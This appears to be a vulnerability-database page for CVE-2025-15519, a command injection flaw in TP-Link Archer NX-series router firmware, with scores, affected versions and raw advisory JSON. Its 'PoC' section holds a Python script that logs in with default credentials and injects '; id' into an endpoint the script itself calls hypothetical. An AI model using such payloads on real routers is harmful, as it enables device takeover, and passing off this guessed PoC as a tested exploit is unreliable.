Security Vulnerability Report
CVE-2025-15519 CVSS 7.2 HIGH

CVE-2025-15519

Published: 2026-03-23 18:16:24
Last Modified: 2026-03-31 19:04:49
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

Improper input handling in a modem-management administrative CLI command on TP-Link Archer NX200, NX210, NX500 and NX600 allows crafted input to be executed as part of an operating system command. An authenticated attacker with administrative privileges may execute arbitrary commands on the operating system, impacting the confidentiality, integrity, and availability of the device.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:archer_nx600:3.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:archer_nx500_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:archer_nx500:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:archer_nx210_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:archer_nx210:3.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:archer_nx200_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:archer_nx200:3.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:tp-link:archer_nx600:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
TP-Link Archer NX200 (specific firmware versions)
TP-Link Archer NX210 (specific firmware versions)
TP-Link Archer NX500 (specific firmware versions)
TP-Link Archer NX600 (specific firmware versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# PoC for CVE-2025-15519
# Target: TP-Link Archer NX200, NX210, NX500, NX600
# Requires: Admin privileges

target_ip = "192.168.0.1"
username = "admin"
password = "admin"  # Replace with actual creds

login_url = f"http://{target_ip}/"
exploit_url = f"http://{target_ip}/admin/modem/manage"  # Hypothetical vulnerable endpoint

session = requests.Session()

# 1. Authenticate
login_payload = {"username": username, "password": password}
session.post(login_url, data=login_payload)

# 2. Exploit Command Injection
# Payload: ; id (Execute 'id' command)
payload = "; id"

# Assuming the vulnerable parameter is 'cli_cmd'
exploit_payload = {"cli_cmd": payload}
response = session.post(exploit_url, data=exploit_payload)

if response.status_code == 200:
    print("Request sent. Check response for command output.")
else:
    print("Failed to send request.")

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15519", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-23T18:16:23.840", "lastModified": "2026-03-31T19:04:48.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input handling in a modem-management administrative CLI command on TP-Link Archer NX200, NX210, NX500 and NX600 allows crafted input to be executed as part of an operating system command. An authenticated attacker with administrative privileges may execute arbitrary commands on the operating system, impacting the confidentiality, integrity, and availability of the device."}, {"lang": "es", "value": "Manejo inadecuado de entradas en un comando CLI administrativo de gestión de módem en TP-Link Archer NX200, NX210, NX500 y NX600 permite que una entrada manipulada sea ejecutada como parte de un comando del sistema operativo. Un atacante autenticado con privilegios administrativos puede ejecutar comandos arbitrarios en el sistema operativo, afectando la confidencialidad, integridad y disponibilidad del dispositivo."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": 
"NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx600_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "77429691-1193-4480-A64E-E1FB19D6A073"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx600:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "58132EDD-47B7-4E46-B280-FE58A920AE43"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.5.0", 
"matchCriteriaId": "70EF52E9-1D92-4778-99C5-3B76B81681FA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx500:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "40D78DBB-CAEA-4C2E-B703-2898B73A0A5E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx210_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "22EA51B1-332E-48BB-BDBA-09A99ECB942F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:archer_nx210:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DA336E76-7910-4780-BCA0-1DA2AA7F9418"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:archer_nx200_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.3.0", "matchCriteriaId": "48125D02-70B1-4448-BB33-4759FF0E3936"}]}, {"operator": "OR", "negate": false, "cpe ... (truncated)